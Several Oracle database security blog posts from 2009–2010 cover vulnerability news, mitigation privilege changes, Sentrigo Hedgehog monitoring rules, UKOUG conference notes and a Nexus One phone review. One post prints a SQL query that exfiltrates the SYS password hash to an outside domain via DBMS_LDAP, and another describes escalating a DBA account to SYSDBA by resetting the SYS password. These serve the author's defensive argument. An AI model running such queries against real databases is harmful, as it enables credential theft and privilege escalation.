Three Tier Oracle Security in London ~ Paul M. Wright

Hi All,

Nice paper from Pete on Sentrigo Hedgehog usage which also references the Java vulnerability work by David.

I noticed that David’s 11g presentation is up at YouTube http://www.youtube.com/watch?v=IZq3D2pvyNE ~ I have already seen the vulnerability being adapted to provide other CREATE SESSION to DBA escalations not yet published… this research is opening the door to a lot of other Oracle/Java vulnerabilities.
But all is not bad for Oracle on YouTube as the Sun Solaris Security team have an interesting video entitled “Protecting Oracle” which includes information on the new “ORACLE” role (not group) within Solaris 10. http://www.youtube.com/watch?v=kcuW03_YTTQ Worth checking out IMO. Time to reinstall my http://www.opensolaris.com box.
YouTube, owned by google of course, are also hosting a video showing how to search for tnsnames.ora entries on the Web. http://www.youtube.com/watch?v=SuZDmuFYaVY . This is pretty basic Google Hacking but a scary wake up call as well. I recommend carrying out this type of google search on your own organisation to make sure that you do not come up in the search results. Additionally don’t open Oracle ports to the Internet as there will always be new research that is ahead of your hardening guide.
Talking of Google I have received my Nexus-One from the States and I am glad to say that it is marvellous.
Standard Micro-USB and SD card with standard earphone and can take the back off to replace the battery. This is the IBM PC of the Smart Phone future IMO and remembering our DOS history lesson tells us that the hardware is not as important as the software…so here is a quick summary of my experience with the Eclair 2.1 Android OS.
When first connected it installs an update,from google and connects gmail, google docs, google maps etc perfectly.
The voice recognition works reasonably well. Screen is excellent and responsive. There are plenty of apps on http://www.google.com/enterprise/marketplace/home with linkedin and skype etc in pipeline.
Screen keyboard takes a while to get used to but does work effectively. Multitouch works fine. Was tempting to wait for the Desire or Legend but I wanted to have confidence of connecting to google through their own device to support their OS. Don’t keep anything sensitive in the GCloud but for normal data that you are prepared to share , this is the bees knees. The bottom screen buttons are a bit jittery at times and the trackball could wear out like on the blackberry in a year or two so I think google will improve the hardware with their second phone. However there is no need to use the trackball at all as the screen works perfectly well. Main factor is that the phone connects to the GCloud perfectly. The phone also has the usual news, temp etc and the map integration is amazing especially if you are prepared to opt into the location services. Not for everyone all the time but if you became lost this could be a lifesaver. Oh nearly forgot.. the actual telephone works reliably as well.
I would recommend buying the Nexus-One from google direct. Came in 1.5 days via DHL with the accessories which are high quality and easy to use. Bought the docking bay, spare battery and extra adaptor. Have also ordered a Gel protective case from Amazon. Even though the phones get tested for resiliency, the Nexus is heavy and metallic and will IMO be prone to dropping and cracked screens. Rather than test this theory I am playing safe with a case though the silicon screen covers reportedly make the screen greasy and not as easy to use so not bought any of those.
The HTC Legend and Desire look good but had to get something now and also prefer to be able to sync closely with google’s services. Take care though as clear-text confidential work information should not go through google and keep an eye on resources like this http://www.google-watch.org/ to see both sides. The Desire and Legend have a better optical trackball but I have not had to use the trackball at all yet, so if you like the logged in google services, I think the Nexus is the better option (with SIM only plan e.g. Vfone or O2). Given that the UK launch of the Nexus has been put back, ordering direct from the states will be the only option for a while.
Lastly we have to watch out for folks phishing that google cookie..there have been some gmail attacks documented by Mike Bailey at Blackhat among others.
“Cloud” security, for googlephones or shared Oracle infrastructure, is one of the hot subjects for this year for good reason so keep safe and secure,
Cheers,
Paul

March 15th, 2010 | Category: Uncategorized | Comments Off

Hello World,

Congratulations to Sentrigo for being nominated again in the SC Awards in the US for Hedgehog.
http://www.scmagazineus.com/scawards2010-finalists/section/1309/

Just came across an ex-colleague from Pentest Ltd named Simon Fletcher who has started a blog on Oracle Security.
http://blog.fifteentwentyone.co.uk/2010/02/sql92security.html
Nice post and good luck with the new blog. Oracle config issues like these are interesting for already very highly secured environments. Though IMO this is icing on the cake currently as there are still default scott/tigers, open firewall 1521 ports and… even in high security environments… Aurora bugs to fix first… But it is interesting and got me reading about Oracle security configurations in general when I came across this statement
“The default value of sec_return_server_release_banner is TRUE” at this URL.
http://www.articles.freemegazone.com/oracle-11g-password-features.php?ref=3

Default to secure…? Doesn’t sound right .. better check this to make sure …

SQL> sho parameter sec_return_server_release_banner;
NAME TYPE VALUE
------------------------------------ ----------- ------------------------------
sec_return_server_release_banner boolean FALSE
--
--that looks more like what I was expecting... so..
--
SQL> alter system set sec_return_server_release_banner=TRUE scope=spfile;
System altered.


Then have to reboot of course.

Don get’s it right with a nice summary of 11g security params here
.. http://www.dba-oracle.com/t_11g_new_hacking_prevention.htm

Ok so the release banner is actually insecure by default but on the positive side the additional secure config params in 11g are an improvement…but these are all still icing on the cake which is currently sitting on a Java Jelly.

Talking of release banners Slavik has observed that Oracle sends a RESEND after every connection attempt perhaps in an attempt to interfere with version identification. Will have a look at this later.
http://www.slaviks-blog.com/2010/03/07/oracle-tns-resend-packet/

I note there is an Oracle Security event in Manchester on the 11th March though check first on the business/technical balance.
http://www.oracle.com/webapps/events/EventsDetail.jsp?p_eventId=103823&src=6808550&src=6808550&Act=23

Have a good week and keep safe and secure.

Cheers,
Paul

March 8th, 2010 | Category: Uncategorized | Comments Off

Hi Folks,

Vulnerability in E-Business Suite R12 requires non-default diagnostics mode so Low risk.
http://www.securityfocus.com/archive/1/509460
Having said that it is worth keeping an eye on Internet facing Oracle applications, though there is not a huge amount on this from O’Reilly and Apress.
Google books has a relevant book free of charge named “Security, Audit and Control Features Oracle E-Business Suite” http://books.google.co.uk/books?id=JWrCxjgsfHcC&printsec=frontcover#v=onepage&q=&f=false.
The main book for E-Business Suite security is John Abel’s though that is based on 11i of course.
Steven Chan’s blog is a good read for Oracle Apps security as well.

Other recent related reading has included http://www.databasesecurity.com/ExploitingPLSQLinOracle11g.pdf . This paper confirms the importance of firewall egress in Oracle Three Tier environments. So for instance commands like this should be prevented from exfiltrating data out of the firewall.

SELECT DBMS_LDAP.INIT((SELECT PASSWORD FROM SYS.USER$ WHERE NAME ='SYS')||'.oraclesecurity.com',80) FROM DUAL;

The executing account only needs SELECT ANY DICTIONARY, because DBMS_LDAP is publicly executable.

SQL> select grantee from all_tab_privs where table_name='DBMS_LDAP';
GRANTEE
------------------------------
PUBLIC

The server IP address has no business opening a port out of the Internet facing firewall. This command can be added to the other examples in http://www.red-database-security.com/wp/oracle_cheat_sheet.pdf

So part of the solution to this issue (along with blocking egress) is to:

SQL> conn sys as sysdba
Enter password:
Connected.
SQL> REVOKE EXECUTE ON SYS.DBMS_LDAP FROM PUBLIC;
Revoke succeeded.

But what uses this package under the hood and is there any software within the DB/Application architecture that depends on that PUBLIC execute?… Well if you have read my latest paper ~ SecuringJavaInOracle you will know that the solution is to write a Hedgehog rule on SYS.DBMS_LDAP package monitoring all calls that contain that package so you can see what actually uses it:

Object=‘SYS.DBMS_LDAP'

Note that the above rule only triggers when DBMS_LDAP is successfully executed. This rule is good for profiling the use of the package, but to alert to failed attempts to use or exploit the package, HH must alert on the text of the SQL statement as follows:

Statement matches ‘DBMS_LDAP’

This second Statement rule will alert even if the executing statement fails due to
lack of correct privilege for instance. A way to test this rule works is as follows.

Select ‘DBMS_LDAP ’from dual;

This will trigger the second rule to alert but not the first.

Using the above method we can fix security issues with low risk of affecting the application’s functionality. Real time Application Monitoring is an important part of the SDLC in mature applications, along with Static code analysis and Dynamic application testing. More on this at the upcoming ISSD Conference.

Cheers,
Paul

March 1st, 2010 | Category: Uncategorized | Comments Off

Updated Securing Java in Oracle paper here.

David’s work has drawn attention.
http://www.h-online.com/security/news/item/Vulnerability-in-Oracle-11gR2-allows-system-privileges-for-all-Update-923143.html
http://www.computerworld.com/s/article/9151318/Black_Hat_Zero_day_hack_of_Oracle_11g_database_revealed?taxonomyId=1
etc..
What the reports miss is that this definitely affects 10.2.0.4.3 as well in a big way.

Oracle have provided some guidance in the absence of a patch:

- revoke execute on "oracle/aurora/util/Wrapper" from public;
- grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
- grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
- revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;

Of course the problem is knowing the effect that these privilege changes will have before making the changes. Most organisations either take the risk of the change breaking functionality or decide to stay as they are. What is needed is a low risk method of evaluating the effect of the change before it is made..That is exactly the subject of my updated paper Securing Java in Oracle paper. This paper describes using Database Application Monitoring Systems to profile application behaviour prior to applying the fix so the effect can be predicted, thus lowering risk.

Different subject… I have been interested in the difference between DBA account privileges and SYSDBA account privileges for a while. There are a few listed here http://www.oracleforensics.com/wordpress/index.php/2008/09/16/sysdba-specific-privileges/.
One of the reasons it interests me is that any DBA can gain SYSDBA quite trivially. Not by direct grant and not by shifting the SYSDBA bit in memory, but by simply changing the SYS password via ALTER USER SYS IDENTIFIED BY NEWPASSWORD; which can be done by any DBA user via ALTER USER system privilege. This makes any DBA escalation a SYSDBA escalation so why increasingly differentiate their privileges?
There is a safeguard to ALTERing SYS’s password but it can be bypassed by using the GRANT method of changing a user’s password as Alex states http://blog.red-database-security.com/2010/02/24/how-to-prevent-a-user-granted-the-alter-user-privilege-from-changing-syssystem-password-and-how-to-bypass-it/.

Additionally by using the Java API in Oracle it is possible to call the OS as the oracle OS user, thus commands such as orapwd can be invoked which allow the sys password to be changed to a given value! .. more detail on this at a later date…but suffice it to say that Securing Java in Oracle should be given high priority due to it’s highly privileged access to the OS from low privileged DB accounts.

I will be presenting on the subject of Securing Java in Oracle both via the SDLC and using DAMS at the ISSD conference in May http://www.issdconference.com/index.php?option=com_content&view=article&id=161. See you there.

Cheers,
Paul

February 25th, 2010 | Category: Uncategorized | Comments Off

David Litchfield’s Java/Oracle security research has been made public by the Blackhat conference in DC before it is patched by Oracle. Additionally there is some misinformation going round that this work only affects 11.2 which is incorrect as it affects 10.2.0.4.3 as well. These vulnerabilities are theoretically easy to fix but since theoretical is not good enough for real world I have written a short paper to explain how to test the fixes before deploying them, along with some analysis about preventing this type of issue in the future. This is in my opinion the most serious research for a long time and needs to be acted on, so hopefully this paper will help solve a few headaches out there.
Cheers,
Paul

February 7th, 2010 | Category: Uncategorized | Comments Off

Hello Folks,
So back in the saddle and Jan CPU is 7.5 for Linux so needs to be taken seriously. The PSU containing the CPU installs nicely for 10.2.0.4.3 and gives full detail of the vulnerabilities being fixed whilst installing…makes interesting reading. The Jan CPU does not fix all the bugs I was expecting it to fix, so there are still some serious vulns in the pipeline.
This is an interesting blog entry that I came across.
http://intevydis.blogspot.com/2010/01/oracle-weblogic-1032-node-manager-fun.html
Congrats to Oracle on the EU merger go ahead. So Larry has the full stack now. Exciting times ahead for Oracle folks.
More to come and business as usual.
Cheers,
Paul

January 26th, 2010 | Category: Uncategorized | Comments Off

Been ill this week with man flu ~ not bird or swine flu, much more serious than that..

..So back to the plot.. In the current absence of Definer’s Rights Roles, there is a temptation for Devs to GRANT EXECUTE to PUBLIC on their new packages so the privs can carry through to other schema’s packages. PUBLIC is too wide a grouping, and just because it is the only Definer’s Rights Role, does not mean that ALL grants should be made to it. This is bad habit picked up to save working out the actual privileges required.
Therefore it is a good idea to alert to these PUBLIC grants using HH RegEx rules with the MATCHES keyword as below:

statement MATCHES 'to\s*public'

Note that the character literals in the regEx are case insensitive with HH.

For more in depth RegEx rule writing there is a nice page on Sentrigo’s web site at the URL below, which I recommend reading:
http://www.sentrigo.com/how-to-compose-effective-and-efficient-regular-expressions

Additionally I would like to mention, Alex’s Anti Hacker class in SF, taking place January 12-14, 2010 in San Francisco, California. https://pages.sentrigo.com/Anti-Hacking.html.
I know Alex has experience of implementing defensive solutions with a number of commercial customers and is at the cutting edge of offensive research as well, which is a powerful combination. The syllabus looks interesting so worth checking out…and maybe taking in the Bay Area and the bridge at the same time.

Cheers,
Paul

December 13th, 2009 | Category: Uncategorized | Comments Off

The dust has now settled so let’s see what has survived in the memory banks..
Tom’s presentation was entertaining with an application development security theme. I missed Alex Keh’s talk on AD which was a shame as looking at the slides it was a good talk (download password is at the bottom of the printed paper agenda given in the bags).
Instead I went to Slavik’s SQL injection talk and learnt some more ways to extrude data via error messages. Slavik’s talk was a good summary of the best of Oracle security research and was well attended. Then to Joel’s DBLinks presentation which was a well thought out methodical and thorough talk on how DB links behave in distributed and RAC environments. Finally to Pete’s Data Security talk which was good revision and again well attended with folks meeting up again in the evening for meet the speaker where I discussed the maximum SCN issue over DBLinks with Joel . The Security Roundtable the next day was a good opportunity to discuss new ideas, among those is the notion of Definer Rights Roles (akin to public but with the ability to revoke and deny the customizable Definer Rights Role from a user). The PL/SQL speakers did not understand the the security importance of this proposed feature when I had mentioned it at “meet the speaker” the night before, but found “like minds” at the security round table. It was inspiring to talk to people working for Oracle who are still highly motivated to improve the product and prepared to listen to folks outside of Oracle for ideas and user stories. Excellent.
In summary I think the networking aspect was probably the highlight of the conference ~ being able to meet other speakers and discussing ideas with them was Great..more to come on the some of the technical lessons learnt.

December 6th, 2009 | Category: Uncategorized | Comments Off

So UKOUG next week, where I will be attending Monday and Tuesday. There are quite a few Oracle security presentations some of which are listed below. Many of the presentation pdfs have already been posted on UKOUG’s site, so you can print them off before attending if you wish.

10:45 - 11:45 Hall 1
Server Technology Keynote: What are we still doing wrong?
Thomas Kyte - Oracle
12:05 - 13:05 Hall 10B
Active Directory and Windows Security Integration with Oracle Database
Alex Keh - Oracle
12:05 - 12:50 Hall 6
SQL Injection attacks
Slavik Markovich - Sentrigo
13:40 - 14:40 Hall 9
Oracle Database Links part 2 - Distributed Transactions
Joel Goodman - Oracle
14:50 - 15:35 Hall 10A
The right way to secure data
Pete Finnigan - PeteFinnigan.com
16:00 - 18:00 Hall 11B
Security and Vault Management
David Storey - Oracle
Tuesday
10:35 - 11:35 Hall 1 Foyer Level 5
Oracle Security roundtable
Pete Finnigan - PeteFinnigan.com
Co-presenter: Slavik Markovich - Sentrigo
Paul Wright - Markit
Kevin Else - No Fools
Keith Hutton - Cervello Consultants
12:05 - 13:05 Hall 10A
Securing your web services
Gerard Davison - Oracle
15:00 - 15:45 Hall 9
The murky world of Database Character Sets
Paul Hancock - Lloyds Banking Group
17:05 - 18:05 Hall 5
Oracle Database Security done right
Frits Hoogland - VX Company

See you there..

Cheers,
Paul

November 29th, 2009 | Category: Uncategorized | Comments Off